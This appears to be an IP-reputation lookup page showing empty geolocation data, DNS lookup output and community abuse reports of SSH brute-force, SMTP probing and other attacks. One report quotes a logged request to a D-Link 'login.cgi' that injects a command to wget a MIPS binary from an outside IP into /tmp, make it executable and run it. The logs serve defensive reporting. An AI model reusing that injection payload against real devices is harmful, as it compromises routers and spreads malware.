Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: None

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 145.80.79.55
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 9144
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;145.80.79.55.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025020600 1800 900 604800 86400

;; Query time: 17 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Feb 06 18:53:48 CST 2025
;; MSG SIZE  rcvd: 105
Host info
Host 55.79.80.145.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 55.79.80.145.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
183.82.108.241 attackbotsspam
SIP/5060 Probe, BF, Hack -
2020-04-23 16:31:12
117.87.47.1 attackbots
Apr 23 06:52:24 nextcloud sshd\[21884\]: Invalid user postgres from 117.87.47.1
Apr 23 06:52:24 nextcloud sshd\[21884\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.87.47.1
Apr 23 06:52:25 nextcloud sshd\[21884\]: Failed password for invalid user postgres from 117.87.47.1 port 45102 ssh2
2020-04-23 16:15:31
118.89.27.72 attackbots
Apr 23 06:46:01 ns392434 sshd[25626]: Invalid user oracle from 118.89.27.72 port 42196
Apr 23 06:46:01 ns392434 sshd[25626]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.89.27.72
Apr 23 06:46:01 ns392434 sshd[25626]: Invalid user oracle from 118.89.27.72 port 42196
Apr 23 06:46:04 ns392434 sshd[25626]: Failed password for invalid user oracle from 118.89.27.72 port 42196 ssh2
Apr 23 06:52:29 ns392434 sshd[26117]: Invalid user testftp from 118.89.27.72 port 41400
Apr 23 06:52:29 ns392434 sshd[26117]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.89.27.72
Apr 23 06:52:29 ns392434 sshd[26117]: Invalid user testftp from 118.89.27.72 port 41400
Apr 23 06:52:31 ns392434 sshd[26117]: Failed password for invalid user testftp from 118.89.27.72 port 41400 ssh2
Apr 23 06:55:16 ns392434 sshd[26302]: Invalid user admin from 118.89.27.72 port 41244
2020-04-23 15:56:16
2a02:598:bbbb:2::8161 attackbots
20 attempts against mh-misbehave-ban on cedar
2020-04-23 16:16:05
155.230.28.207 attack
Fail2Ban Ban Triggered (2)
2020-04-23 16:06:29
113.125.26.101 attackspam
2020-04-23T08:10:39.460891abusebot-3.cloudsearch.cf sshd[12716]: Invalid user ubuntu from 113.125.26.101 port 54408
2020-04-23T08:10:39.467741abusebot-3.cloudsearch.cf sshd[12716]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=113.125.26.101
2020-04-23T08:10:39.460891abusebot-3.cloudsearch.cf sshd[12716]: Invalid user ubuntu from 113.125.26.101 port 54408
2020-04-23T08:10:41.224058abusebot-3.cloudsearch.cf sshd[12716]: Failed password for invalid user ubuntu from 113.125.26.101 port 54408 ssh2
2020-04-23T08:14:18.941680abusebot-3.cloudsearch.cf sshd[12962]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=113.125.26.101  user=root
2020-04-23T08:14:21.094706abusebot-3.cloudsearch.cf sshd[12962]: Failed password for root from 113.125.26.101 port 50390 ssh2
2020-04-23T08:15:30.486397abusebot-3.cloudsearch.cf sshd[13024]: Invalid user admin from 113.125.26.101 port 58470
...
2020-04-23 16:16:36
14.63.46.157 attackbots
Attempts against SMTP/SSMTP
2020-04-23 16:25:20
200.89.178.229 attackbotsspam
Apr 23 08:10:31 163-172-32-151 sshd[25143]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=229-178-89-200.fibertel.com.ar  user=root
Apr 23 08:10:33 163-172-32-151 sshd[25143]: Failed password for root from 200.89.178.229 port 36996 ssh2
...
2020-04-23 15:56:53
183.220.109.204 attackspam
Attempts against SMTP/SSMTP
2020-04-23 16:06:01
211.35.76.241 attackbotsspam
2020-04-23T09:29:25.582771ns386461 sshd\[9088\]: Invalid user fq from 211.35.76.241 port 42432
2020-04-23T09:29:25.588831ns386461 sshd\[9088\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=211.35.76.241
2020-04-23T09:29:27.038540ns386461 sshd\[9088\]: Failed password for invalid user fq from 211.35.76.241 port 42432 ssh2
2020-04-23T09:35:09.035858ns386461 sshd\[14349\]: Invalid user dh from 211.35.76.241 port 42129
2020-04-23T09:35:09.040264ns386461 sshd\[14349\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=211.35.76.241
...
2020-04-23 16:13:03
111.229.122.177 attackbotsspam
Apr 23 09:41:08 sso sshd[6353]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.229.122.177
Apr 23 09:41:10 sso sshd[6353]: Failed password for invalid user postgres from 111.229.122.177 port 34968 ssh2
...
2020-04-23 16:27:14
189.199.252.187 attackbotsspam
Invalid user ubuntu from 189.199.252.187 port 56102
2020-04-23 16:14:30
193.70.0.93 attack
Invalid user uf from 193.70.0.93 port 39272
2020-04-23 16:03:55
206.189.47.166 attackbotsspam
SSH Brute Force
2020-04-23 16:09:35
188.152.239.98 attackspam
C1,DEF GET /login.cgi?cli=aa%20aa%27;wget%20http://178.238.236.119/mips%20-O%20->%20/tmp/leonn;chmod%20777%20/tmp/leonn;/tmp/leonn%20dlink.mips%27$
2020-04-23 16:17:59

Recently Reported IPs

219.11.163.58 209.201.142.119 253.3.157.94 201.223.115.238
8.107.212.148 43.65.136.239 116.203.214.198 154.115.11.53
242.189.197.67 145.169.7.155 195.161.148.97 73.25.87.14
78.49.86.22 116.91.60.100 125.248.235.223 12.65.115.54
224.156.43.22 166.63.94.145 81.21.253.132 151.127.213.167